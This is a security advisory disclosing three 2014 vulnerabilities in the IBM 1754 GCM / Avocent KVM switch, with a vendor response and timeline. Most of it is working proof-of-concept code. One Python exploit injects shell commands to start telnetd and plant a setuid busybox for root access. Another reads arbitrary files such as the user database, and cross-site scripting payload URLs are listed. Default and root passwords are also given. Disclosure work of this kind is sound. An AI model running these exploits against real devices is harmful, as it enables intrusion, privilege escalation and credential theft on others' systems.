* Product description *
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance. Versions v1. 20.0 . 22575 and prior are
vulnerables.
Note that this vulnerability is also present in some DELL and probably
other vendors of this rebranded KVM. I contacted Dell but no response has
been received.
* 1. Remote code execution *
CVEID: CVE - 2014 - 2085
Description: Improperly sanitized input may allow a remote authenticated
attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
Exploit for Avocent KVM switch v1. 20.0 . 22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a
valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target
( pass : target) then do "/tmp/su -" to gain root (password "root" )
alex.a.bravo@gmail.com
"""
from StringIO import StringIO
import pycurl
import os
sessid = "1111111111"
target = "192.168.0.10"
durl = "https://" + target + " / systest.php?lpres = ; % 20 / usr /
sbin / telnetd % 20 ; % 20cp % 20 / bin / busybox % 20 / tmp / su % 20 ; % 20chmod %
206755 % 20 / tmp / su % 20 ;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0 )
c.setopt(c.SSL_VERIFYHOST, 0 )
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try :
print "[*] Sending GET to " + target + " with session id " + sessid
+ "..."
c.perform()
c.close()
except :
print ""
finally :
print "[*] Done"
print "[*] Trying telnet..."
print "[ * ] Login as target / target, then do / tmp / su - and enter password
\ "root\""
os.system( "telnet " + target)
* 2. Arbitrary file read *
CVEID: CVE - 2014 - 3081
Description: This device allows any authenticated user to read arbitrary
files. Files can be anywhere on the target.
PoC of this vulnerability:
from StringIO import StringIO
import pycurl
sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"
durl = "https://" + target + " / prodtest.php?engage = video_
bits&display = results&filename = " + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER, 0 )
c.setopt(c.SSL_VERIFYHOST, 0 )
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try :
c.perform()
c.close()
except :
print ""
content = storage.getvalue()
print content.replace( "<td>" ," ").replace(" < / td> "," ")
* 3. Cross site scripting non - persistent *
CVEID: CVE - 2014 - 3080
Description: System is vulnerable to cross - site scripting, caused by
improper validation of user - supplied input . A remote attacker could exploit
this vulnerability using a specially - crafted URL to execute script in a
victim's Web browser within the security context of the hosting Web site,
once the URL is clicked. An attacker could use this vulnerability to steal
the victim's cookie - based authentication credentials.
Examples:
http: / / kvm / kvm.cgi? % 3Cscript % 3Ealert % 28 % 22aaa % 22 % 29 % 3C / script % 3E
https: / / kvm / avctalert.php?arg1 = dadadasdasd&arg2 = dasdasdas&key = % 3Cscript % 3Ealert % 28 % 22aaa % 22 % 29 % 3C / script % 3E
* Vendor Response: *
IBM release 1.20 . 20.23447 firmware
* Timeline: *
2014 - 05 - 20 - Vendor (PSIRT) notified
2014 - 05 - 21 - Vendor assigns internal ID
2014 - 07 - 16 - Patch Disclosed
2014 - 07 - 17 - Vulnerability disclosed
* External Information: *
Info about the vulnerability (spanish):
http: / / www.bitcloud.es / 2014 / 07 / tres - nuevas - vulnerabilidades - en - ibm - gcm.html
IBM Security Bulletin:
http: / / www - 947.ibm .com / support / entry / portal / docdisplay?lndocid = MIGR - 5095983
|